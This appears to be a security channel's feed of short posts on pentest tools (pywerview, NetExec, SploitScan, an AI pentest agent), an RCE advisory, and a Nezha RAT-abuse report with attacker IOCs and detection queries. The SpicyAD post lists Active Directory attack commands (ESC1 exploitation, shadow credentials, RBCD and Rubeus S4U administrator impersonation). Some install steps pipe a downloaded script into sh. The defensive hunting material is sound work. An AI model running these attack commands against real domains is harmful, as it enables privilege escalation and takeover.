Securelist
Using DCOM objects for remote command execution
Kaspersky expert describes how DCOM interfaces can be abused to load malicious DLLs into memory using the Windows Registry and Control Panel.
If you’re a penetration tester, you know that lateral movement is becoming increasingly difficult, especially in well-defended environments. One common technique for remote command execution has been the use of DCOM objects
#windows #dcom
RouterOS security analyzer for detecting misconfigurations, weak settings, and known vulnerabilities (CVE)
#network #mikrotik #routeros
GitHub
GitHub - the-useless-one/pywerview: A (partial) Python rewriting of PowerSploit's PowerView
A partial Python rewrite of PowerSploit's PowerView
Installation:
git clone https://github.com/the-useless-one/pywerview
cd pywerview
python3 -m venv venv
source ./venv/bin/activate
pip install -r requirements.txt
./pywerview.py --help
#pywerview #soft #ad
EVA is an AI-assisted penetration testing agent that enhances offensive security workflows by providing structured attack guidance, contextual analysis, and multi-backend AI integration
Installation:
# Ollama for a local endpoint (optional)
curl -fsSL https://ollama.ai/install.sh | sh
# EVA installation
git clone https://github.com/ARCANGEL0/EVA.git
cd EVA
chmod +x eva.py
./eva.py
# Add it to PATH so it is accessible from anywhere
sudo mv eva.py /usr/local/bin/eva
#ai #eva #agent
A tool for conducting pentests
A huge number of changes:
▪️ Built-in LDAP signing and channel binding checks
▪️ RDP command execution
▪️ certipy find integration
▪️ raisechild module: automatic forest priv esc
▪️ Dumping LSA/SAM via MSSQL
▪️ etc
Installation in:
sudo apt update && sudo apt install netexec
#nxc #netexec #python #soft
Ontinue
Nezha: The Monitoring Tool That's Also a Perfect RAT
Research from Ontinue reveals how Nezha, a legitimate open-source monitoring tool, is being abused by attackers as a stealthy post-exploitation RAT.
Nezha is a self-hosted, lightweight server and website monitoring and O&M tool. Detection only occurs when attackers execute commands through the agent.
IOCs:
Infrastructure:
nz.632313373[.]xyz:8008
47.79.42[.]91
Ports:
8008 - Default Nezha dashboard port
443 - Common alternative (46% of deployments)
80 - Common alternative (28% of deployments)
8888 - Alternative port
18008 - Alternative port
File paths:
C:\nezha\nezha-agent.exe
C:\nezha\config.yml
C:\temp\nezha-agent.exe
C:\nezha.zip
/opt/nezha/agent/nezha-agent
/opt/nezha/agent/config.yml
Binary names:
nezha-agent.exe
nezha-agent
nezha_agent
Process chains (parent → child):
services.exe → nezha-agent.exe
powershell.exe → nezha-agent.exe
nezha-agent.exe → powershell.exe
nezha-agent.exe → cmd.exe
nezha-agent.exe → whoami.exe
nezha-agent.exe → systeminfo.exe
nezha-agent.exe → net.exe
Command line:
nezha-agent.exe -c C:\nezha\config.yml
Config keys, environment variables and strings:
client_secret
NZ_SERVER
NZ_CLIENT_SECRET
NZ_TLS
nezhahq
Queries:
// Hunt for Nezha agent process execution and file paths
DeviceProcessEvents
| where TimeGenerated > ago(90d)
| where FileName has_any ("nezha-agent", "nezha_agent")
or FolderPath has_any ("\\nezha\\", "/nezha/", "/opt/nezha/")
or ProcessCommandLine has_any ("client_secret", "nezhahq", "NZ_SERVER", "NZ_CLIENT_SECRET")
| project TimeGenerated, DeviceName, FileName, FolderPath, ProcessCommandLine, AccountName, InitiatingProcessFileName
| order by TimeGenerated desc
// Hunt for network connections to Nezha default ports and known infrastructure
DeviceNetworkEvents
| where TimeGenerated > ago(90d)
| where RemotePort in (8008, 8888, 18008)
or RemoteUrl has_any ("nezha", "nezhahq")
| project TimeGenerated, DeviceName, InitiatingProcessFileName, RemoteIP, RemotePort, RemoteUrl, ActionType
| order by TimeGenerated desc
// Hunt for Nezha configuration files and agent binaries on disk
DeviceFileEvents
| where TimeGenerated > ago(90d)
| where FileName has_any ("nezha-agent", "config.yml")
or FolderPath has_any ("\\nezha\\", "/opt/nezha/", "C:\\nezha")
| project TimeGenerated, DeviceName, ActionType, FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
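The three hunting queries above, re-implemented in plain Python and run over constructed sample telemetry, as an added example that is not Ontinue's code or part of the original post. It mirrors the KQL match conditions with case-insensitive substring tests (a loose stand-in for KQL's has_any, which matches whole terms), adds a direct comparison against the published IP and domain, which the network query above does not include, and grades a bare config.yml outside a nezha folder as low confidence because that file name is common. The event dicts, the host dashboard.example.invalid and the demo() function are constructed for this example.

```python
"""Plain-Python mirror of the three Nezha hunting queries (added example)."""

# Match terms taken from the queries and the IOC list above.
NEZHA_FILENAMES = ("nezha-agent", "nezha_agent")
NEZHA_FOLDERS = ("\\nezha\\", "/nezha/", "/opt/nezha/")
NEZHA_CMDLINE_TERMS = ("client_secret", "nezhahq", "NZ_SERVER", "NZ_CLIENT_SECRET")
NEZHA_PORTS = {8008, 8888, 18008}
NEZHA_URL_TERMS = ("nezha", "nezhahq")
# Published infrastructure from the IOC list, refanged so it can be compared directly.
KNOWN_INFRA = {"47.79.42.91", "nz.632313373.xyz"}


def has_any(value, terms):
    """Case-insensitive substring test; a loose stand-in for KQL has_any,
    which matches whole terms rather than arbitrary substrings."""
    v = (value or "").lower()
    return any(t.lower() in v for t in terms)


def match_process(ev):
    """Mirror of the DeviceProcessEvents query."""
    return (has_any(ev.get("FileName"), NEZHA_FILENAMES)
            or has_any(ev.get("FolderPath"), NEZHA_FOLDERS)
            or has_any(ev.get("ProcessCommandLine"), NEZHA_CMDLINE_TERMS))


def match_network(ev):
    """Mirror of the DeviceNetworkEvents query, plus a direct check against
    the published IP and domain (not part of the KQL above)."""
    url = (ev.get("RemoteUrl") or "").lower()
    return (ev.get("RemotePort") in NEZHA_PORTS
            or has_any(url, NEZHA_URL_TERMS)
            or ev.get("RemoteIP") in KNOWN_INFRA
            or url in KNOWN_INFRA)


def match_file(ev):
    """Mirror of the DeviceFileEvents query. Returns None, 'low' or 'high':
    a config.yml outside a nezha folder is a common file name, so only 'low'."""
    if (has_any(ev.get("FileName"), NEZHA_FILENAMES)
            or has_any(ev.get("FolderPath"), NEZHA_FOLDERS + ("C:\\nezha",))):
        return "high"
    if has_any(ev.get("FileName"), ("config.yml",)):
        return "low"
    return None


def hunt(process_events, network_events, file_events):
    """Run all three hunts; returns a list of (hunt, confidence, event)."""
    hits = []
    for ev in process_events:
        if match_process(ev):
            hits.append(("process", "high", ev))
    for ev in network_events:
        if match_network(ev):
            hits.append(("network", "high", ev))
    for ev in file_events:
        conf = match_file(ev)
        if conf:
            hits.append(("file", conf, ev))
    return hits


# Constructed sample telemetry (not real events); field names follow the queries.
SAMPLE_PROCESS = [
    {"FileName": "nezha-agent.exe", "FolderPath": "C:\\nezha\\nezha-agent.exe",
     "ProcessCommandLine": "nezha-agent.exe -c C:\\nezha\\config.yml",
     "InitiatingProcessFileName": "services.exe"},
    {"FileName": "powershell.exe",
     "FolderPath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ProcessCommandLine": "powershell.exe -c whoami",
     "InitiatingProcessFileName": "explorer.exe"},
    # Renamed binary: only the environment-style arguments give it away.
    {"FileName": "svc.exe", "FolderPath": "C:\\temp\\svc.exe",
     "ProcessCommandLine": "svc.exe NZ_SERVER=dashboard.example.invalid:8008 NZ_CLIENT_SECRET=REDACTED",
     "InitiatingProcessFileName": "cmd.exe"},
]
SAMPLE_NETWORK = [
    {"InitiatingProcessFileName": "nezha-agent.exe", "RemoteIP": "47.79.42.91",
     "RemotePort": 8008, "RemoteUrl": ""},
    {"InitiatingProcessFileName": "chrome.exe", "RemoteIP": "203.0.113.5",
     "RemotePort": 443, "RemoteUrl": "example.com"},
    # Alternative port 443, caught only by the known-domain check.
    {"InitiatingProcessFileName": "curl.exe", "RemoteIP": "198.51.100.7",
     "RemotePort": 443, "RemoteUrl": "nz.632313373.xyz"},
]
SAMPLE_FILE = [
    {"ActionType": "FileCreated", "FileName": "config.yml", "FolderPath": "C:\\nezha\\config.yml"},
    {"ActionType": "FileCreated", "FileName": "config.yml",
     "FolderPath": "C:\\Users\\alice\\project\\config.yml"},
    {"ActionType": "FileCreated", "FileName": "nezha-agent",
     "FolderPath": "/opt/nezha/agent/nezha-agent"},
]


def demo():
    """Run the hunts over the constructed samples and return the hits."""
    return hunt(SAMPLE_PROCESS, SAMPLE_NETWORK, SAMPLE_FILE)


if __name__ == "__main__":
    for name, conf, ev in demo():
        print(f"[{name}/{conf}] {ev}")
```

Running the block prints six hits: two process events (the plain agent and the renamed binary with NZ_SERVER in its arguments), two network events (the default port plus the published domain over 443) and three file events, of which the project-folder config.yml is flagged low so that it can be triaged separately rather than dropped.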
#nezha #ioc #detection #ti
A rather interesting tool; it works in interactive or command-line mode.
SpicyAD is a C# Active Directory penetration testing tool designed for authorized security assessments. It combines multiple AD attack techniques into a single, easy-to-use tool with both interactive and command-line interfaces
Examples:
# 1. Enumerate vulnerable templates
.\SpicyAD.exe enum-vulns
# 2. Exploit ESC1 (auto-chains to PKINIT)
.\SpicyAD.exe esc1 /template:ESC1 /target:administrator /sid
# 1. Add shadow credential to target machine
.\SpicyAD.exe shadow-creds add /target:SERVER$ /sid
# 1. Set RBCD
.\SpicyAD.exe rbcd set /target:SERVER$ /controlled:YOURPC$
# 2. Use Rubeus for S4U
Rubeus.exe s4u /user:YOURPC$ /rc4:<hash> /impersonateuser:administrator /msdsspn:cifs/SERVER.evilcorp.net /ptt
# 3. Access target
dir \\SERVER\C$
# 4. Cleanup
.\SpicyAD.exe rbcd clear /target:SERVER$ /force
#ad #windows #redteam
The Ten Most Critical Web Application Security Risks
#owasp #web
Forwarded from HaHacking
• SERVER-SIDE
• CLIENT-SIDE
• ADVANCED
Collections of information:
🔖 DingyShark/BurpSuiteCertifiedPractitioner
🔖 botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study
Lab write-ups:
📖 frank-leitner/portswigger-websecurity-academy
📖 thelicato/portswigger-labs
Do a good deed: add your own write-ups to the collection!
@HaHacking
A handy tool for finding exploits and known vulnerabilities and exploiting them, with AI support (ChatGPT, Gemini, Grok and DeepSeek) and import from popular scanners.
sudo apt install sploitscan
Installation:
git clone https://github.com/xaitax/SploitScan.git
cd sploitscan
pip install -r requirements.txt
PyPI:
pip install --user sploitscan
PoC sources:
➡️ GitHub
➡️ ExploitDB
➡️ VulnCheck (free API key required)
➡️ Packet Storm
➡️ Nuclei
Import from:
Nessus (.nessus)
Nexpose (.xml)
OpenVAS (.xml)
Docker (.json)
Put the API keys for the supported services in the config file (config.json):
{
"vulncheck_api_key": "",
"openai_api_key": "",
"google_api_key": "",
"grok_api_key": "",
"deepseek_api_key": ""
}
Search by CVE:
sploitscan CVE-2024-1709
sploitscan CVE-2024-1709 CVE-2024-21413
Search by keywords:
sploitscan -k "Outlook Express"
Import and export:
sploitscan --import-file path/to/yourfile.nessus --type nessus
sploitscan CVE-2024-1709 -e {json,csv,html}
AI assistance:
sploitscan --ai openai CVE-2024-21413
┌───[ 🤖 AI-Powered Risk Assessment ]
|
| 1. Risk Assessment
| -------------------
| ...
| 2. Potential Attack Scenarios
| ------------------------------
| ...
| 3. Mitigation Recommendations
| ------------------------------
| ...
| 4. Executive Summary
| ---------------------
| ...
#sploitscan #poc #cve #python
▪️ Vendor: XSpeeder (Chinese manufacturer)
▪️ Vulnerable product: SXZOS firmware, used in SD-WAN devices, routers and network infrastructure equipment
▪️ Type: remote code execution without authentication (pre-authentication RCE)
▪️ CVSS: 9.8
#poc #cve